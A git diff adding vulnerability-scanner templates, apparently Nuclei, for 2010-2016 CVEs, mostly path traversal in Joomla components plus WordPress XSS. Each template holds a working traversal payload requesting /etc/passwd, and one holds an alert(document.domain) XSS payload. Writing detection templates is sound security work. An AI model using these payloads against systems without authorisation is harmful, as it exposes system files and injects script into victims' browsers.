diff --git a/CVE-2010-1307.yaml b/CVE-2010-1307.yaml
new file mode 100644
index 0000000..70c1ac4
--- /dev/null
+++ b/CVE-2010-1307.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1307
+
+info:
+ name: Joomla! Component Magic Updater - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12070
+ - https://www.cvedetails.com/cve/CVE-2010-1307
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1308.yaml b/CVE-2010-1308.yaml
new file mode 100644
index 0000000..991bc53
--- /dev/null
+++ b/CVE-2010-1308.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1308
+
+info:
+ name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12066
+ - https://www.cvedetails.com/cve/CVE-2010-1308
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1312.yaml b/CVE-2010-1312.yaml
new file mode 100644
index 0000000..022a54a
--- /dev/null
+++ b/CVE-2010-1312.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1312
+
+info:
+ name: Joomla! Component News Portal 1.5.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12077
+ - https://www.cvedetails.com/cve/CVE-2010-1312
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1313.yaml b/CVE-2010-1313.yaml
new file mode 100644
index 0000000..46a6e36
--- /dev/null
+++ b/CVE-2010-1313.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1313
+
+info:
+ name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12082
+ - https://www.cvedetails.com/cve/CVE-2010-1313
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1352.yaml b/CVE-2010-1352.yaml
new file mode 100644
index 0000000..5dd77fa
--- /dev/null
+++ b/CVE-2010-1352.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1352
+
+info:
+ name: Joomla! Component Juke Box 1.7 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12084
+ - https://www.cvedetails.com/cve/CVE-2010-1352
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1470.yaml b/CVE-2010-1470.yaml
new file mode 100644
index 0000000..bcb3e84
--- /dev/null
+++ b/CVE-2010-1470.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1470
+
+info:
+ name: Joomla! Component Web TV 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12166
+ - https://www.cvedetails.com/cve/CVE-2010-1470
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1472.yaml b/CVE-2010-1472.yaml
new file mode 100644
index 0000000..4294244
--- /dev/null
+++ b/CVE-2010-1472.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1472
+
+info:
+ name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12167
+ - https://www.cvedetails.com/cve/CVE-2010-1472
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1473.yaml b/CVE-2010-1473.yaml
new file mode 100644
index 0000000..c2e7878
--- /dev/null
+++ b/CVE-2010-1473.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1473
+
+info:
+ name: Joomla! Component Advertising 0.25 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12171
+ - https://www.cvedetails.com/cve/CVE-2010-1473
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1476.yaml b/CVE-2010-1476.yaml
new file mode 100644
index 0000000..c1718ac
--- /dev/null
+++ b/CVE-2010-1476.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1476
+
+info:
+ name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12150
+ - https://www.cvedetails.com/cve/CVE-2010-1476
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1531.yaml b/CVE-2010-1531.yaml
new file mode 100644
index 0000000..c118f12
--- /dev/null
+++ b/CVE-2010-1531.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1531
+
+info:
+ name: Joomla! Component redSHOP 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12054
+ - https://www.cvedetails.com/cve/CVE-2010-1531
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1534.yaml b/CVE-2010-1534.yaml
new file mode 100644
index 0000000..871c657
--- /dev/null
+++ b/CVE-2010-1534.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1534
+
+info:
+ name: Joomla! Component Shoutbox Pro - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12067
+ - https://www.cvedetails.com/cve/CVE-2010-1534
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1607.yaml b/CVE-2010-1607.yaml
new file mode 100644
index 0000000..81f69a9
--- /dev/null
+++ b/CVE-2010-1607.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1607
+
+info:
+ name: Joomla! Component WMI 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12316
+ - https://www.cvedetails.com/cve/CVE-2010-1607
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1719.yaml b/CVE-2010-1719.yaml
new file mode 100644
index 0000000..b41a153
--- /dev/null
+++ b/CVE-2010-1719.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1719
+
+info:
+ name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12233
+ - https://www.cvedetails.com/cve/CVE-2010-1719
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1723.yaml b/CVE-2010-1723.yaml
new file mode 100644
index 0000000..4b50604
--- /dev/null
+++ b/CVE-2010-1723.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1723
+
+info:
+ name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12289
+ - https://www.cvedetails.com/cve/CVE-2010-1723
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1952.yaml b/CVE-2010-1952.yaml
new file mode 100644
index 0000000..5e71f4a
--- /dev/null
+++ b/CVE-2010-1952.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1952
+
+info:
+ name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12239
+ - https://www.cvedetails.com/cve/CVE-2010-1952
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1956.yaml b/CVE-2010-1956.yaml
new file mode 100644
index 0000000..a9e931f
--- /dev/null
+++ b/CVE-2010-1956.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1956
+
+info:
+ name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12285
+ - https://www.cvedetails.com/cve/CVE-2010-1956
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1957.yaml b/CVE-2010-1957.yaml
new file mode 100644
index 0000000..7f16c27
--- /dev/null
+++ b/CVE-2010-1957.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1957
+
+info:
+ name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12235
+ - https://www.cvedetails.com/cve/CVE-2010-1957
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-2034.yaml b/CVE-2010-2034.yaml
new file mode 100644
index 0000000..4600c60
--- /dev/null
+++ b/CVE-2010-2034.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2034
+
+info:
+ name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/34003
+ - https://www.cvedetails.com/cve/CVE-2010-2034
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-2037.yaml b/CVE-2010-2037.yaml
new file mode 100644
index 0000000..e3db0ee
--- /dev/null
+++ b/CVE-2010-2037.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2037
+
+info:
+ name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/34005
+ - https://www.cvedetails.com/cve/CVE-2010-2037
+ tags: cve,cve2010,lfi,joomla
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-2920.yaml b/CVE-2010-2920.yaml
new file mode 100644
index 0000000..48974bc
--- /dev/null
+++ b/CVE-2010-2920.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2920
+
+info:
+ name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12120
+ - https://www.cvedetails.com/cve/CVE-2010-2920
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2011-2780.yaml b/CVE-2011-2780.yaml
new file mode 100644
index 0000000..1cb0a0a
--- /dev/null
+++ b/CVE-2011-2780.yaml
@@ -0,0 +1,35 @@
+id: CVE-2011-2780
+
+info:
+ name: Chyrp 2.x - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ tags: cve,cve2011,lfi,chyrp
+ description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744."
+ reference:
+ - http://www.justanotherhacker.com/advisories/JAHx113.txt
+ - http://www.openwall.com/lists/oss-security/2011/07/13/5
+ - http://www.ocert.org/advisories/ocert-2011-001.html
+ - http://www.openwall.com/lists/oss-security/2011/07/13/6
+ - http://www.securityfocus.com/bid/48672
+ - http://secunia.com/advisories/45184
+ - http://osvdb.org/73891
+ - http://securityreason.com/securityalert/8312
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565
+ - http://www.securityfocus.com/archive/1/518890/100/0/threaded
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml
index d7ca7ac..ed80489 100644
--- a/CVE-2012-4242.yaml
+++ b/CVE-2012-4242.yaml
@@ -6,6 +6,7 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
tags: cve,cve2012,wordpress,xss,wp-plugin
+ description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page."
requests:
- method: GET
diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml
index 05ae701..4b827a6 100644
--- a/CVE-2013-2287.yaml
+++ b/CVE-2013-2287.yaml
@@ -6,6 +6,7 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
tags: cve,cve2013,wordpress,xss,wp-plugin
+ description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter."
requests:
- method: GET
diff --git a/CVE-2013-3526.yaml b/CVE-2013-3526.yaml
index b081219..a65162e 100644
--- a/CVE-2013-3526.yaml
+++ b/CVE-2013-3526.yaml
@@ -6,6 +6,7 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin
+ description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
requests:
- method: GET
diff --git a/CVE-2014-4535.yaml b/CVE-2014-4535.yaml
index 95bd42d..8e6d842 100644
--- a/CVE-2014-4535.yaml
+++ b/CVE-2014-4535.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4535
+ cwe-id: CWE-79
+ description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
diff --git a/CVE-2014-4536.yaml b/CVE-2014-4536.yaml
index d1f974d..d226a92 100644
--- a/CVE-2014-4536.yaml
+++ b/CVE-2014-4536.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4536
+ cwe-id: CWE-79
+ description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter."
requests:
- method: GET
diff --git a/CVE-2014-6308.yaml b/CVE-2014-6308.yaml
index bc9fe62..7b52384 100755
--- a/CVE-2014-6308.yaml
+++ b/CVE-2014-6308.yaml
@@ -6,6 +6,7 @@ info:
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
tags: cve,cve2014,lfi
+ description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php."
requests:
- method: GET
diff --git a/CVE-2014-9094.yaml b/CVE-2014-9094.yaml
index 81ae8ce..12b29d2 100644
--- a/CVE-2014-9094.yaml
+++ b/CVE-2014-9094.yaml
@@ -6,6 +6,7 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
+ description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
requests:
- method: GET
diff --git a/CVE-2014-9444.yaml b/CVE-2014-9444.yaml
new file mode 100644
index 0000000..a80d56c
--- /dev/null
+++ b/CVE-2014-9444.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-9444
+
+info:
+ name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Frontend Uploader WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9444
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2015-1000012.yaml b/CVE-2015-1000012.yaml
index b9a13af..75c35ff 100644
--- a/CVE-2015-1000012.yaml
+++ b/CVE-2015-1000012.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-1000012
+ cwe-id: CWE-200
+ description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
requests:
- method: GET
diff --git a/CVE-2015-2807.yaml b/CVE-2015-2807.yaml
index ddb93e6..b39565c 100644
--- a/CVE-2015-2807.yaml
+++ b/CVE-2015-2807.yaml
@@ -8,6 +8,7 @@ info:
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
+ description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter."
requests:
- method: GET
diff --git a/CVE-2015-9414.yaml b/CVE-2015-9414.yaml
index d5c3fea..d65a7b2 100644
--- a/CVE-2015-9414.yaml
+++ b/CVE-2015-9414.yaml
@@ -8,6 +8,12 @@ info:
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2015-9414
+ cwe-id: CWE-79
+ description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter."
requests:
- method: GET
diff --git a/CVE-2015-9480.yaml b/CVE-2015-9480.yaml
index bcd3d48..aff9aca 100644
--- a/CVE-2015-9480.yaml
+++ b/CVE-2015-9480.yaml
@@ -8,6 +8,12 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-9480
+ cwe-id: CWE-22
+ description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter."
requests:
- method: GET
diff --git a/CVE-2016-1000126.yaml b/CVE-2016-1000126.yaml
index 0d3a928..7570661 100755
--- a/CVE-2016-1000126.yaml
+++ b/CVE-2016-1000126.yaml
@@ -6,6 +6,12 @@ info:
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000126
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin admin-font-editor v1.8"
requests:
- method: GET
diff --git a/CVE-2016-1000127.yaml b/CVE-2016-1000127.yaml
index 459e6c5..51c400a 100755
--- a/CVE-2016-1000127.yaml
+++ b/CVE-2016-1000127.yaml
@@ -7,6 +7,11 @@ info:
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
